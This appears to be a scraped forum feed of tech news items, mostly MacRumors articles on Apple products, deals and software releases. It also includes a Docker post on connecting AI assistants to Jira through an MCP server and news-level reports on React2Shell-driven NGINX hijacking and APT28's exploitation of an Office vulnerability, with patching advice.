NGINX is a “foundational element of contemporary web infrastructure,” the Datadog blog notes. The routing and processing of traffic by NGINX is governed by its configuration files. Poor configuration or a successful breach allow it to be used for web traffic hijacking.
For CSOs, the defense against these attacks is to lock down those configuration files to resist their being tampered with.
React2Shell is the exploitation of a vulnerability (CVE-2025-55182) in the React 19 library for building application interfaces that was discovered late last year. The hole allows attackers to execute arbitrary code on affected servers.
Related content: Anatomy of React2Shell
Researchers at Greynoise said this week that exploitation activity targeting React Server Components has consolidated significantly. Two IP addresses now account for 56% of all observed exploitation attempts, down from 1,083 unique sources earlier.
Unpatched versions of React are at risk of compromise.
Initial abuse
“What we saw in a lot of our honeypots and threat intelligence early on with React2Shell is attackers were using it for cryptomining,” said Simon. Others have seen exploitation used to deploy reverse shells. But more recently, Simon said, Datadog Security is seeing threat actors, once in an IT network, going after web servers to highjack their traffic.
An analysis of the scripts used by threat actors on compromised NGINX web servers shows they use a multi-stage and automated approach to attacking the environments. The toolkits contain target discovery plus several scripts designed to establish persistence and for the creation of malicious configuration files containing instructions intended to redirect web traffic, says the Datadog blog.
There is no commonality among the targeted organizations, Simon noted.
Hijacking web traffic is an old tactic for threat actors. In fact David Shipley, head of Canadian security awareness training provider Beauceron Security, called these attacks on NGINX servers “a return to old-school hacking in the era of stronger identity controls like password managers, MFA and passkeys.”
“If you’re up against a more robustly defended user, you go back to attacking the infrastructure so you can go back into attacker-in-the-middle mode for some good old session cookie capture and other hijinks on the NGINX,” he said.
Finding and exploiting server side vulnerabilities or network security vulnerabilities is fast, cheap, and easy with AI, he added.
Simon said CSOs can help protect NGINX servers from being exploited by monitoring configuration file integrity, including keeping records of their server configurations so any changes can be spotted.
It’s vital that web servers have the latest security patches, he added. And admins should also monitor the NGINX security advisory website.
View the full article
- 0 comments
- 37 views
-
Amazon says that Prime subscribers can access Alexa+ with the Alexa app, Alexa-enabled devices, or the Alexa.com website. Prime members can access Alexa+ by saying "Alexa, upgrade to Alexa+," or by logging into their Amazon account on the Alexa website.
Alexa+ has been in testing since February 2025, offering a smarter, more personalized, and more proactive assistant experience. Amazon says Alexa+ is much more capable than the prior version of Alexa thanks to its updated architecture that uses large language models from Amazon Nova and Anthropic.
Alexa is able to do things like order takeout, make restaurant reservations, book rides, and schedule home repairs, plus it can control smart home products and answer questions like any other chatbot. It integrates with Amazon services, and can integrate with hardware like Ring cameras.
Amazon Prime in the U.S. is priced at $14.99 per month or $139 per year, and Alexa+ is considered one of the Prime benefits. Customers without Prime can try Alexa+ through a limited, free chat experience on Alexa.com and in the Alexa app. Subscribing solely to Alexa+ costs $19.99 per month, which makes no sense for anyone since Prime is cheaper.
Amazon's revamped Alexa+ experience is seeing a wide rollout a couple months ahead of when Apple is expected to debut a more powerful, personalized version of Siri. Siri is going to get an update in spring 2026, likely in iOS 26.4.
Alexa and Siri were two of the original large-scale voice assistants, so it will be interesting to see how Alexa+ compares to the revamped version of Siri when Siri launches.Tag: Amazon
This article, "Amazon's Alexa+ Now Free for All U.S. Prime Members, Beating Apple's Smarter Siri to Market" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 34 views
-
Sid Meier's Civilization VII Apple Arcade Edition features the Civilization VII base game experience, with mouse support, controller support, and intuitive touch controls available. Players take on the role of one of many legendary leaders from history, aiming to build the greatest empire the world has ever known.
Gamers will construct cities and control armies to expand their territory, conquering or cooperating with rival civilizations for the resources to evolve and discover new technological breakthroughs. Multiplayer gameplay is not supported at launch, and DLC add-ons are not available. Large map sizes are limited to devices that have at least 8GB RAM.
Along with Civilization VII, Apple Arcade is also gaining musical rhythm adventure Felicity's Door, puzzle game I Love Hue Too+, and classic video arcade title Retrocade. Retrocade is available on the Vision Pro as well as the iPhone and iPad.
Apple Arcade is Apple's subscription gaming service, priced at $6.99 per month. The service allows up to six family members to share a single subscription, and games feature no in-app fees or ads.Tag: Apple Arcade
This article, "Civilization VII Coming to Apple Arcade Tomorrow" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 32 views
-
The new series:
Imperfect Women — March 18, 2026
Margo's Got Money Troubles — April 15, 2026
Widow's Bay — April 29, 2026
Maximum Pleasure Guaranteed — May 20, 2026
Cape Fear — June 5, 2026
Lucky — July 15, 2026
The new films:
Eternity — February 13, 2026
Outcome — April 10, 2026
The Dink — July 24, 2026
Mayday — September 4, 2026
Matchbox: The Movie — October 9, 2026
Way of the Warrior Kid — November 20, 2026
We have provided a brief overview of each new show and film below.
New Series
Imperfect Women
Based on Araminta Hall's novel of the same name, "Imperfect Women" is a psychological thriller that "examines a crime that shatters the lives of a decades-long friendship of three women." The series stars Elisabeth Moss, Kerry Washington, and Kate Mara.
Margo's Got Money Troubles
"Margo's Got Money Troubles" is described as "a bold, heartwarming, and comedic family drama" that follows recent college dropout and aspiring writer, Margo (Elle Fanning), the daughter of an ex-Hooters waitress (Michelle Pfeiffer) and ex-pro wrestler (Nick Offerman). Margo has a new baby, mounting bills, and dwindling ways to pay for things.
Widow's Bay
Apple says "Widow's Bay" blends genuine horror with character-driven comedy.
Widow's Bay is "a quaint island town 40 miles off the coast of New England," but "something lurks beneath the surface." Mayor Tom Loftis (Matthew Rhys) is desperate to revive his struggling community, but as tourists start arriving, it appears that local residents might have been right about the island being cursed after all.
Maximum Pleasure Guaranteed
Billed as a darkly comedic thriller, "Maximum Pleasure Guaranteed" follows newly divorced mom Paula (Tatiana Maslany).
"Convinced she witnessed a murder — while simultaneously struggling through a custody battle and an identity crisis — Paula begins her own investigation, one that could unravel a greater conspiracy while also holding the keys to rebuilding her family and sense of self."
Cape Fear
"Inspired by the 1991 remake directed by Martin Scorsese and produced by Steven Spielberg, a storm is coming for happily married attorneys Anna (Amy Adams) and Tom Bowden (Patrick Wilson) when Max Cady (Javier Bardem), the notorious killer they are responsible for putting behind bars, is let out of prison — and he wants vengeance."
Lucky
"Written by Jonathan Tropper and Cassie Pappas and based on Marissa Stapley’s bestselling novel, 'Lucky' centers on a young woman (Anya Taylor-Joy) who left behind the life of crime she was raised in years ago, but must now embrace her darker, criminal side one final time in a desperate attempt to escape her past."
New Films
Outcome
"Outcome" is a dark comedy that centers on Reef Hawk (Keanu Reeves), a Hollywood star facing extortion. With the support of his lifelong friends Kyle (Cameron Diaz) and Xander (Matt Bomer), and his lawyer Ira (Jonah Hill), Reef tries to make amends with anyone he could have possibly wronged in hopes of identifying the blackmailer.
Eternity
"Eternity" is a rom-com: "In an afterlife where souls have one week to decide where to spend eternity, Joan (Elizabeth Olsen) is faced with the impossible choice between the man she spent her life with (Miles Teller) and her first love (Callum Turner), who died young and has waited decades for her to arrive."
The Dink
In this comedy movie, "washed up former tennis prodigy Dusty Boyd (Jake Johnson) has been reduced to coaching unruly children at his father Chuck's (Ed Harris) suburban country club. Desperate for his father's approval, Dusty blindly supports Chuck's vendetta against the new craze taking over the club: pickleball."
Mayday
Ryan Reynolds and Kenneth Branagh team up in "Mayday," a "genre-bending, action-packed buddy comedy movie that flips the spy thriller on its head."
"When hotshot U.S. Navy pilot Lieutenant Troy 'Assassin' Kelly (Reynolds) is sent on a top-secret mission into Russian territory at the height of the Cold War, the operation implodes, leaving him stranded behind enemy lines. Discovered by Nikolai Ustinov (Branagh), a gruff ex-KGB agent with a penchant for American culture, Troy thinks he's toast — but could an unlikely alliance between the two lead to Troy's rescue and a bond neither saw coming?"
Matchbox: The Movie
"Inspired by the iconic Mattel toys, 'Matchbox The Movie' is an action-packed, globetrotting adventure about a group of friends since childhood who have their lives upended when undercover CIA agent Sean (John Cena), their long-absent former leader, returns to their small town and unwittingly gets them embroiled in a frantic international pursuit to save the world."
Way of the Warrior Kid
"Middle school has been a nightmare for Marc (Jude Hill), a good kid who's bullied by his classmates and feels like he's behind in everything, from academics to P.E. to just making friends. That changes when his injured Uncle Jake (Chris Pratt), a decorated Navy SEAL, comes to spend the summer and recuperate with Marc and his mom, Sarah (Linda Cardellini)."Tag: Apple TV Shows
This article, "Apple TV Announces 12 New Shows and Films Coming This Year" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 30 views
-
Developers can download the macOS Tahoe 26.3 update by opening up the System Settings app, selecting the General category, and then choosing Software Update. Beta Updates will need to be enabled, and a free developer account is required.
There's no word yet on what's included in macOS Tahoe 26.3, and no new features have been found during beta testing so far.
We'll likely see Apple release macOS Tahoe 26.3 next week. Related Roundup: macOS TahoeRelated Forum: macOS Tahoe
This article, "macOS Tahoe 26.3 Release Candidate Now Available" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 30 views
-
Registered developers can download the updates from the Settings app on the iPhone or iPad by going to the General section and selecting the Software Update option.
iOS 26.3 adds a tool for transitioning from an iPhone to an Android device. Transfers can be initiated during the device setup process, and moving data from one device to another can now be done without having to download a specific app.
Apple's transfer process supports moving photos, messages, notes, apps, passwords, phone number, and more.
The update also includes a Notification Forwarding setting for third-party wearables in the European Union, and there are some minor changes to the Weather wallpaper. More information on what's changed can be found in our iOS 26.3 beta feature list.
With the RC now available, Apple will likely release iOS 26.3 and iPadOS 26.3 next week. Related Roundups: iOS 26, iPadOS 26Related Forum: iOS 26
This article, "Apple Seeds iOS 26.3 and iPadOS 26.3 Release Candidates" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 38 views
-
The software updates are available through the Settings app on each device, and because these are developer betas, a free developer account is required.
We don't know what new features might be added in watchOS 26.3, visionOS 26.3, and tvOS 26.3, and nothing new has been discovered so far. Apple doesn't typically provide release notes for betas, so we might not know what's new until the software updates see a public launch unless there are outward-facing changes.
The software updates will likely launch next week now that RCs are available.
This article, "Apple Releases watchOS 26.3, tvOS 26.3 and visionOS 26.3 Release Candidates" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 30 views
-
In November 2024, an anonymous listener of the Relay FM tech podcast "Upgrade" claimed that Apple was developing 90Hz display technology that could be used for the next Studio Display, as well as future iPad Air and iMac models. This higher refresh rate would make videos and scrolling look smoother to the eye, but 90Hz would stop short of the 120Hz refresh rate that iPhone, iPad, and Mac models with ProMotion support can achieve.
Now, a MacRumors tipster has backed up that claim, based on alleged information from an internal build of iOS 26 that was leaked online. Indeed, they believe the next Studio Display is likely to max out at 90Hz rather than 120Hz.
Apple's existing devices typically have up to 60Hz or 120Hz refresh rates, so 90Hz would be unusual for Apple. However, while there is no explicit confirmation, the tipster claimed that multiple code strings and display controller references in the internal iOS 26 suggest that the next Studio Display will max out at 90Hz.
The tipster believes that a 90Hz refresh rate would make sense due to bandwidth considerations. Thunderbolt 5 can support 5K resolution at 120Hz without any compression, but they think Apple likely wants to ensure there will be plenty of remaining bandwidth for connecting other devices and peripherals to the new Studio Display.
The current Studio Display has a 60Hz refresh rate.
Apple plans to release a new version of the Studio Display "in the first half of 2026," according to the latest word from Bloomberg's Mark Gurman.
Last month, an unreleased Apple monitor with the model number A3350 surfaced in a Chinese regulatory database, and it is likely the Studio Display 2.
There have been many reports about a new Studio Display being in the works, with rumored features including mini-LED backlighting, a higher refresh rate of up to 90Hz or 120Hz, HDR support, and an A19 chip or A19 Pro chip.
This rumor still warrants some skepticism for now. In addition, the internal iOS 26 build is from early 2025, so Apple's plans may have changed since then.Related Roundups: Apple Pro Display XDR, Apple Studio DisplayRelated Forum: Mac Accessories
This article, "Apple's Upcoming Studio Display 2 Rumored to Have an Unusual Feature" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 26 views
-
- 0 comments
- 35 views
-
- 0 comments
- 44 views
-
Earlier today, Apple released version 3.7 of the Sports app, introducing support for every PGA and LPGA tournament, with live leaderboards, round-by-round scorecards for every golfer, and real-time updates in the app, widgets, and Live Activities. The app already supported the NFL, MLB, NBA, NHL, Premier League, NASCAR, F1, and more. The update also expanded the soccer lineup with support for Copa del Rey, Coppa Italia, Coupe de France, and DFB-Pokal. In addition, tennis coverage now supports real-time stats, making it easier to keep up with the action.
Backend code spotted by MacRumors reveals what's next for Apple Sports in version 3.8. Apple is planning to add support for six South American soccer leagues, including Brazil Serie A, Argentina Primera A, Colombia Primera Liga, Ecuador Serie A, Peru Primera Division, and Chile Primera Division.
The Apple Sports app launched in 2024, offering an easy way to see live scores and statistics. It is available on the iPhone in the U.S., the UK, Canada, France, Germany, Ireland, Italy, Portugal, Spain, the Netherlands, Sweden, Norway, Finland, Denmark, and other select European countries.Tag: Apple Sports
This article, "Six New Leagues Coming to Apple Sports" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 27 views
-
Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.
The Prime 3-in-1 Wireless Charging Station features Qi2.2 support, which lets a compatible MagSafe iPhone charge at up to 25W. It's the same speed as Apple's MagSafe charger, and it is 10W faster than the standard Qi2 MagSafe chargers. You can also simultaneously charge an Apple Watch and AirPods with the device.
Note: You won't see the deal price until checkout.
$30 OFFAnker Prime 3-in-1 Wireless Charging Station for $119.99
There are plenty of other Anker discounts happening on Amazon this week, including the Prime 14-in-1 Thunderbolt 5 Dock back at its all-time low price of $339.99, down from $399.99. You can find this accessory and more on sale in the lists below, and note that as of writing only the new Prime 3-in-1 Wireless Charging Station requires an on-page coupon.
$60 OFFAnker Prime 14-in-1 Thunderbolt 5 Dock for $339.99
Wall Chargers
6-in-1 USB-C Power Strip - $79.99, down from $109.99
140W 4-Port GaN USB-C Charger - $89.99, down from $99.99
6-in-1 Prime USB-C Charging Station - $79.99, down from $109.99
14-in-1 Prime Thunderbolt 5 Dock - $339.99, down from $399.99
Wireless Chargers
Qi2 MagSafe-Compatible Wireless Charger 2-Pack - $25.98, down from $39.99
3-in-1 MagSafe-Compatible Charging Station - $89.99, down from $109.99
3-in-1 MagSafe-Compatible Charging Cube - $99.98, down from $149.95
3-in-1 Prime Wireless Charging Station (NEW) - $119.99 with on-page coupon, down from $149.99
Portable Chargers
MagGo Nano Power Bank 5,000 mAh - $45.99, down from $54.99
MagGo Power Bank 10,000 mAh - $63.99, down from $79.99
SOLIX C300 Power Station with Lantern - $169.99, down from $249.00
SOLIX C1000 Gen 2 Portable Power Station - $429.00, down from $799.00
SOLIX C2000 Gen 2 Portable Power Station - $849.00, down from $1,499.00
If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.
Deals Newsletter
Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!
Related Roundup: Apple Deals
This article, "Amazon Discounts Anker's Newest Prime Chargers" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 31 views
-
The original HomePod was announced at WWDC in 2017 and launched in 2018 after a heavily delayed release. The device was met with mixed reviews; critics praised its outstanding sound quality but pointed out its high price, missing features, and limited functionality compared to rivals.
Apple dropped its price from $349 to $299 in April 2019 and, in March 2021, the company announced that it was discontinuing the first-generation HomePod, instead shifting its focus to the HomePod mini, which launched the previous year. The decision left a gap in Apple's product lineup for a full-sized smart speaker until the company introduced the second-generation model via a press release on January 18, 2023. It launched on February 3, 2023.
The second-generation HomePod looks virtually identical to the original, although it is 0.2 inches shorter and has a larger edge-to-edge LED touchscreen on top. It also boasts a range of upgrades and changes compared to its 2018 predecessor, including the S7 chip, a U1 ultra wideband chip, a removable power cable, a temperature and humidity sensor, and sound recognition. However, it features two fewer microphones and horn-loaded tweeters.
Apple is widely rumored to be planning a wave of new smart home devices, including a home security camera, over the next few years, but it is not clear if the HomePod is part of that. Apple appeared to be exploring a new HomePod with a touchscreen display at the top of the device around 2024, ostensibly proven by leaked prototype images, but there have been no further reports of such a device or any third-generation HomePod for over a year.
Rumors about Apple's plans for the smart home now center on an all-new smart home hub device, which has been described as a HomePod with a square iPad-like 7-inch screen and an A18 chip, with support for the next-generation version of Siri. It is expected to launch this year. A new HomePod mini is also rumored to be released this year. Related Roundup: HomePodBuyer's Guide: HomePod (Neutral)
This article, "HomePod 2 Now Over 3 Years Old, With No Sign of New Model" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 27 views
-
Here were Apple's starting prices when the devices launched in September 2024:
iPhone 16: $799
iPhone 16 Plus: $899
iPhone 16 Pro: $999
iPhone 16 Pro Max: $1,199Apple has since lowered its starting prices for new iPhone 16 and iPhone 16 Plus models, which remain available as previous-generation options:
iPhone 16: $699
iPhone 16 Plus: $799Finally, here are Apple's starting prices for the refurbished models:
iPhone 16: $619
iPhone 16 Plus: $699
iPhone 16 Pro: $759
iPhone 16 Pro Max: $929The refurbished iPhone 16 lineup is also rolling out on Apple's online store in Canada, the U.K., France, Germany, Italy, Spain, the Netherlands, Belgium, Switzerland, and select other countries, but not every model is available in every country yet.
Apple's refurbished iPhones are unlocked, and they come with a new battery, a new outer shell, and a plain box with a USB-C cable. The devices are also covered by Apple's one-year limited warranty, and they are eligible for extended AppleCare+ or AppleCare One coverage. Apple says its refurbished products are thoroughly cleaned and tested, and generally they are virtually indistinguishable from brand new devices.
iPhone 16 Pro and Pro Max models feature 6.3-inch and 6.9-inch displays, respectively, up from the 6.1-inch iPhone 15 Pro and 6.7-inch iPhone 15 Pro Max. Other new features included a Camera Control button, an A18 Pro chip optimized for Apple Intelligence, a 48-megapixel Ultra Wide camera, support for 4K at 120 FPS video recording, longer battery life, faster charging over MagSafe, and improved microphones.
The lower-end iPhone 16 and iPhone 16 Plus also have a Camera Control and Apple Intelligence.Related Roundup: iPhone 16Tag: Apple Refurbished ProductsRelated Forum: iPhone
This article, "Apple Begins Selling Refurbished iPhone 16 and iPhone 16 Pro Models at Lower Prices" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 26 views
-
Note: MacRumors is an affiliate partner with Samsung. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.
In regards to TVs, there are quite a few models of The Frame TV on sale, including all-time low prices on The Frame models from 2025. You can get the 2025 65-inch The Frame TV for $1,199.99 ($600 off), as well as the 75-inch Frame Pro for $1,999.99 ($1,200 off), a match of the all-time low price.
$600 OFF65-inch The Frame for $1,199.99
$1,200 OFF75-inch The Frame Pro for $1,999.99
TVs
55-inch QLED QEF1 Smart TV - $349.99, down from $599.99
55-inch QLED Q7F Smart TV - $399.99, down from $529.99
55-inch QLED Q8F Smart TV - $599.99, down from $749.99
75-inch Vision AI Smart TV - $599.99, down from $1,199.99
50-inch The Frame - $799.99, down from $1,099.99
75-inch Neo QLED QN70F Smart TV - $999.99, down from $1,599.99
65-inch The Frame - $1,199.99, down from $1,799.99
55-inch OLED S95F Smart TV - $1,899.99, down from $2,299.99
75-inch The Frame Pro - $1,999.99, down from $3,199.99
85-inch The Frame Pro - $3,299.99, down from $4,299.99
85-inch Neo QLED QN90F Smart TV - $2,299.99, down from $4,499.99
Monitors
32-inch ViewFinity S70A UHD Monitor - $299.99, down from $459.99
43-inch Smart Monitor M7 - $359.99, down from $499.99
34-inch ViewFinity S6 Monitor - $429.99, down from $699.99
40-inch Odyssey G7 Gaming Monitor - $749.99, down from $1,199.99
49-inch Odyssey OLED G91SD Gaming Monitor - $799.99, down from $1,299.99
49-inch Odyssey G95C Gaming Monitor - $849.99, down from $1,299.99
Galaxy Products
Galaxy XR - Save up to $1,140 with the Explorer Pack
Galaxy Z Fold7 - Save up to $1,000 in instant trade-in credit
Galaxy S25 Ultra - Save up to $700 in instant trade-in credit
Galaxy Ring - Get up to $150 trade-in credit
Galaxy Watch Ultra - Save up to $250
Galaxy Watch 8 - Save up to $200
If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.
Deals Newsletter
Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!
Related Roundup: Apple Deals
This article, "Samsung's Super Bowl Sale Has Up to $1,200 Off The Frame TV and Much More" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 29 views
-
- 0 comments
- 30 views
-
In this post, we’ll show you how to get started with the Atlassian remote MCP server in minutes and how to use it to automate everyday workflows for product and engineering teams.
Figure 1: Discover over 300+ MCP servers including the remote Atlassian MCP server in Docker MCP Catalog.
What is the Atlassian Rovo MCP Server?
Like many teams, we rely heavily on Atlassian tools, especially Jira to plan, track, and ship product and engineering work. The Atlassian Rovo MCP server enables AI assistants and agents to interact directly with Jira and Confluence, closing the gap between where work happens and how teams want to use AI.
With the Atlassian Rovo MCP server, you can:
Create and update Jira issues and epics
Generate and edit Confluence pages
Use your preferred AI assistant or agent to automate everyday workflows
Traditionally, setting up and configuring MCP servers can be time-consuming and complex. Docker removes that friction, making it easy to get up and running securely in minutes.
Enable the Atlassian Rovo MCP Server with One Click
Docker’s MCP Catalog is a curated collection of 300+ MCP servers, including both local and remote options. It provides a reliable starting point for developers building with MCP so you don’t have to wire everything together yourself.
Prerequisites
Before you begin, make sure you have: A machine with 8GB RAM minimum, ideally 16GB Install Docker Desktop To get started with the Atlassian remote MCP server:
Open Docker Desktop and click on the MCP Toolkit tab. Navigate to Docker MCP Catalog Search for the Atlassian Rovo MCP server. Select the remote version with cloud icon Enable it with a single click That’s it. No manual installs. No dependency wrangling.
Why use the Atlassian Rovo MCP server with Docker
Demo by Cecilia Liu: Set up the Atlassian Rovo MCP server with Docker with just a few clicks and use it to generate Jira epics with Claude Desktop
Seamless Authentication with Built-in OAuth
The Atlassian Rovo MCP server uses Docker’s built-in OAuth, so authorization is seamless. Docker securely manages your credentials and allows you to reuse them across multiple MCP clients. You authenticate once, and you’re good to go.
Behind the scenes, this frictionless experience is powered by the MCP Toolkit, which handles environment setup and dependency management for you.
Works with Your Favorite AI Agent
Once the Atlassian Rovo MCP server is enabled, you can connect it to any MCP-compatible client.
For popular clients like Claude Desktop, Claude Code, Codex, or Gemini CLI, connecting is just one click. Just click Connect, restart Claude Desktop, and now we’re ready to go.
From there, we can ask Claude to:
Write a short PRD about MCP Turn that PRD into Jira epics and stories Review the generated epics and confirm they’re correct And just like that, Jira is updated.
One Setup, Any MCP Client
Sometimes AI assistants have hiccups. Maybe you hit a daily usage limit in one tool. That’s not a blocker here.
Because the Atlassian Rovo MCP server is connected through the Docker MCP Toolkit, the setup is completely client-agnostic. Switching to another assistant like Gemini CLI or Cursor is as simple as clicking Connect. No need for reconfiguration or additional setup!
Now we can ask any connected AI assistant such as Gemini CLI to, for example, check all new unassigned Jira tickets. It just works.
Coming Soon: Share Atlassian-Based Workflows Across Teams
We’re working on new enhancements that will make Atlassian-powered workflows even more powerful and easy to share. Soon, you’ll be able to package complete workflows that combine MCP servers, clients, and configurations. Imagine a workflow that turns customer feedback into Jira tickets using Atlassian and Confluence, then shares that entire setup instantly with your team or across projects. That’s where we’re headed.
Frequently Asked Questions (FAQ)
What is the Atlassian Rovo MCP server?
The Atlassian MCP Rovo server enables AI assistants and agents to securely interact with Jira and Confluence. It allows AI tools to create and update Jira issues and epics, generate and edit Confluence pages, and automate everyday workflows for product and engineering teams.
How do I use the Atlassian Rovo MCP server with Docker?
You can enable the Atlassian Rovo MCP server directly from Docker Desktop or CLI. Simply open the MCP Toolkit tab, search for the Atlassian MCP server, select the remote version, and enable it with one click. Connect to any MCP-compatible client. For popular tools like Claude Code, Codex, and Gemini, setup is even easier with one-click integration.
Why use Docker to run the Atlassian Rovo MCP server?
Using Docker to run the Atlassian Rovo MCP server removes the complexity of setup, authentication, and client integration. Docker provides one-click enablement through the MCP Catalog, built-in OAuth for secure credential management, and a client-agnostic MCP Toolkit that lets teams connect any AI assistant or agent without reconfiguration so you can focus on automating Jira and Confluence workflows instead of managing infrastructure.
Less Setup. Less Context Switching. More Work Shipped.
That’s how easy it is to set up and use the Atlassian Rovo MCP server with Docker. By combining the MCP Catalog and Toolkit, Docker removes the friction from connecting AI agents to the tools teams already rely on.
Learn more
Get started with MCP Catalog and Toolkit Explore the Docker MCP Catalog: Discover containerized, security-hardened MCP servers Read more about the Docker MCP Toolkit: Official Documentation
View the full article
- 0 comments
- 38 views
-
Version 3.7 of the app introduces support for every PGA and LPGA tournament, with live leaderboards, round-by-round scorecards for every golfer, and real-time updates in the app, widgets, and Live Activities. The app already supported the NFL, MLB, NBA, NHL, Premier League, NASCAR, F1, Premier League, and more.
Apple has also expanded the soccer lineup with support for Copa del Rey, Coppa Italia, Coupe de France, and DFB-Pokal. In addition, tennis coverage now supports real-time stats, making it easier to keep up with the action.
The Apple Sports app launched in 2024. It is available on the iPhone in the U.S., the UK, Canada, France, Germany, Ireland, Italy, Portugal, Spain, the Netherlands, Sweden, Norway, Finland, Denmark, and select other European countries.Tag: Apple Sports
This article, "Apple Sports Now Supports Golf and More" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 27 views
-
The campaign was spotted in January 2026 by Security researchers at ZScaler ThreatLabz, three days after Microsoft issued an urgent patch for the flaw.
“In this campaign, the threat actor leveraged specially crafted Microsoft RTF files to exploit CVE-2026-21509 and deliver malicious backdoors in a multi-stage infection chain,” the researchers said in a blog post. “ThreatLabz observed active in-the-wild exploitation on January 29, 2026.”
The campaign targeted users in parts of Central and Eastern Europe, including Ukraine, Slovakia, and Romania, with custom social engineering lures. The crafted rich text format (RTF) files triggered the Office vulnerability the moment they were opened, initiating a multi-stage infection chain leading to backdoors and malware implants.
Owing to the significant overlap between the tools, techniques, and procedures (TTPs) between the campaign and those of Russia’s General Staff Main Intelligence Directorate (GRU)-affiliated threat group APT28 (aka Fancy Bear), ZScaler attributed the campaign to the advanced persistent threat (APT) group.
Neusploit hooked users through Office
Operation Neusploit relies heavily on CVE-2026-21509, a high-severity bug in Microsoft Office that Microsoft patched on January 26 after reports of active exploitation.
The infection begins with victims receiving an email with an RTF attachment that contains a weaponized exploit. When opened, the RTF file causes Microsoft Office to execute code that reaches out to threat actor infrastructure and downloads a dropper DLL. The DLL then executes the rest of the malicious chain.
“The threat actor employed server-side evasion techniques, responding with the malicious DLL only when requests originated from the targeted geographic region and included the correct User-Agent HTTP header,” the researchers said.
The campaign used two different variants of the dropper DLL, deploying different components for different purposes.
One campaign, two infection paths
ZScaler found that exploitation of CVE-2026-21509 did not lead to a single uniform payload. Instead, the initial RTF-based exploit branched into two distinct infection paths, each serving a different operational purpose. The choice of dropper reportedly determined whether the attackers prioritized near-term intelligence collection or longer-term access to compromised systems.
In one path, the exploit delivered MiniDoor, a lightweight DLL that focused on email theft. The malware modified Windows registry settings to weaken Microsoft Outlook security controls, allowing it to quietly collect and exfiltrate email data to an attacker-controlled infrastructure. The design and functionality of MiniDoor closely resemble earlier APT28 tooling, aligning with the group’s established espionage-focused attacks.
The second path involved a more elaborate chain that began with PixyNetLoader, which deployed additional payloads and established persistence using techniques such as DLL proxying and COM object hijacking. This loader ultimately installed a Covenant Grunt implant, used specifically in .NET command and control (c2) framework, giving the attackers sustained remote access through cloud-hosted C2 infrastructure.
Mitigation efforts
ZScaler recommended that organizations prioritize patching for CVE-2026-21509, noting that APT28 exploited the flaw within days of Microsoft releasing fixes. Systems running unpatched versions of Microsoft Office remain exposed to weaponized RTF documents that require little user interaction beyond opening the file, significantly raising the risk of compromise in email-driven attack scenarios.
For defensive analysis, ZScaler shared GitHub repositories, including the Windows scheduled task configuration file and the MiniDoor macro code, illustrating the attack paths used in Operation Neusploit. Additionally, the disclosure shared a list of indicators of compromise (IOCs) to support detection efforts, which included file hashes, malicious domains, and URLs. CISA had added the flaw to its known exploited vulnerabilities (KEV) database, giving Federal Civilian Executive Branch (FCEB) agencies until February 16 to patch their systems.
View the full article
- 0 comments
- 34 views
-
Apple said the new Apple Education Hub in Bengaluru will serve as a centralized training and coordination facility for supplier employees in India, marking the company's first education hub of its kind in the country. The hub will begin offering courses in March and operates in collaboration with Manipal Academy of Higher Education, which will provide faculty and curriculum support focused initially on digital literacy and Swift programming.
In parallel with the Bengaluru hub, Apple is broadening its suite of development courses at more than 25 supplier facilities across the country. The updated curriculum will be introduced starting with Tata Electronics and is designed to cover digital literacy, Swift coding, robotics, automation technology, and smart manufacturing practices. Apple said these offerings are funded through its global $50 million Supplier Employee Development Fund, which supports education and skills training initiatives across the company's supply chain.
The company said the new courses build on an existing portfolio of more than 75 programs currently available to supplier employees in India. The offerings span technical skills, professional development, health education, and rights awareness training, which Apple says are designed to ensure workers are informed about workplace standards and protections. Apple works with international organizations and local partners to deliver these programs.
Apple's expanded training effort also includes plans to scale its robotics education program, which launched in India in December 2024. The initiative focuses on training factory educators in dedicated robotics labs, after which those educators adapt the material and conduct hands-on sessions within their own facilities. Apple said it plans to extend the robotics program to additional supplier sites in India later this year.
Apple also announced plans to grow its Vocational Education for Persons with Disabilities program in India. The program recently launched with Salcomp and seeks to provide employment and professional development opportunities for people with disabilities within Apple's supply chain, as well as improve safety, accessibility, and inclusivity practices at manufacturing facilities. To date, the program has supported more than 18,000 supplier employees around the world and builds on Apple's partnership with Enable India.Tag: India
This article, "Apple Teaching Swift and Robotics Across Its India Supply Chain" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 25 views
-
- 0 comments
- 33 views
-
The NFC Forum is the global standards body for Near Field Communication technology. Apple is a board member of the organization. The latest multi-year Technology Roadmap identifies six development priorities that will shape future NFC standards.
One of the most significant changes outlined is work toward substantially faster NFC data rates, up to eight times higher than current levels. The roadmap also places emphasis on improving NFC reader mode interoperability through end-to-end application testing.
The roadmap continues to highlight multipurpose tap functionality, which would allow a single NFC tap to support multiple actions depending on context. The NFC Forum says this would enable readers to request specific credentials needed for a given action.
The NFC Forum said it is beginning work on next-generation NFC wireless charging specifications, with goals that include higher power levels and support for devices with multiple charging receivers. While NFC charging is currently limited to low-power accessory use, expanded standards could influence future devices.
